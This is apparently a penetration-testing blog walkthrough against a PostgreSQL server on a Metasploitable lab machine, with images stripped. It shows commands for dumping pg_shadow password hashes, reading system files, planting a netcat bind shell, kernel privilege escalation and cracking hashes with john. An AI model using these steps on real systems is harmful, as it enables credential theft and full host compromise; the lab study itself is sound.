A Penetration Tester’s Guide to PostgreSQL

Discovery and Version Fingerprinting

nmap -sV -p 5432
PostgreSQL — Version Identification via Nmap
PostgreSQL — Version Identification

Discovery of Database Credentials

PostgreSQL — Discovery of Database Credentials

Database Access

psql -h -U postgres
PostgreSQL — Database Access
postgres-# \l
postgres-# \du
template1=# \dt
template1=# SELECT * FROM users;
postgres-# SELECT usename, passwd FROM pg_shadow;
pg_dump --host= --username=postgres --password --dbname=template1 --table='users' -f output_pgdump
PostgreSQL — List Existing Databases
PostgreSQL — List Database Users
PostgreSQL — List Existing Tables
PostgreSQL — Retrieving Database Passwords
PostgreSQL — Dumping Database Contents
PostgreSQL — Database Enumeration via Metasploit
Metasploit — Retrieve Postgres Server Hashes
Metasploit — Executing PostgreSQL Commands

Command Execution

postgres=# select pg_ls_dir('./');
PostgreSQL — Directory Listing
postgres=# select pg_read_file('PG_VERSION', 0, 200);
PostgreSQL — Reading Server Side Files
postgres-# CREATE TABLE temp(t TEXT);
postgres-# COPY temp FROM '/etc/passwd';
postgres-# SELECT * FROM temp limit 1 offset 0;
PostgreSQL — Reading Local Files
PostgreSQL — Reading Local Files via Metasploit
postgres=# CREATE TABLE pentestlab (t TEXT);
postgres=# INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
postgres=# SELECT * FROM pentestlab;
postgres=# COPY pentestlab(t) TO '/tmp/pentestlab';
PostgreSQL — Write File on the Host
chmod +x pentestlab
Stat Local Listener
nc -vn 2346
python -c "import pty;pty.spawn('/bin/bash')"
PostgreSQL — Connect to Backdoor
PostgreSQL — Code Execution

Privilege Escalation

user@metasploitable:/# uname -a
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Searching Linux Kernel Exploits
Compile the Exploit and Retrieve PID of netlink
nc -lvvp 2345 -e /bin/bash
Create the run File into the tmp directory
chmod +x /tmp/run
nc -vn 2345
python -c "import pty;pty.spawn('/bin/bash')"
Receive the connection with Netcat
Metasploit Linux Privilege Escalation — netlink
Elevated Meterpreter Session — Root Privileges
Examining the Shadow File
john /root/Desktop/password.txt
john --show /root/Desktop/password.txt
Cracked Hashes



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store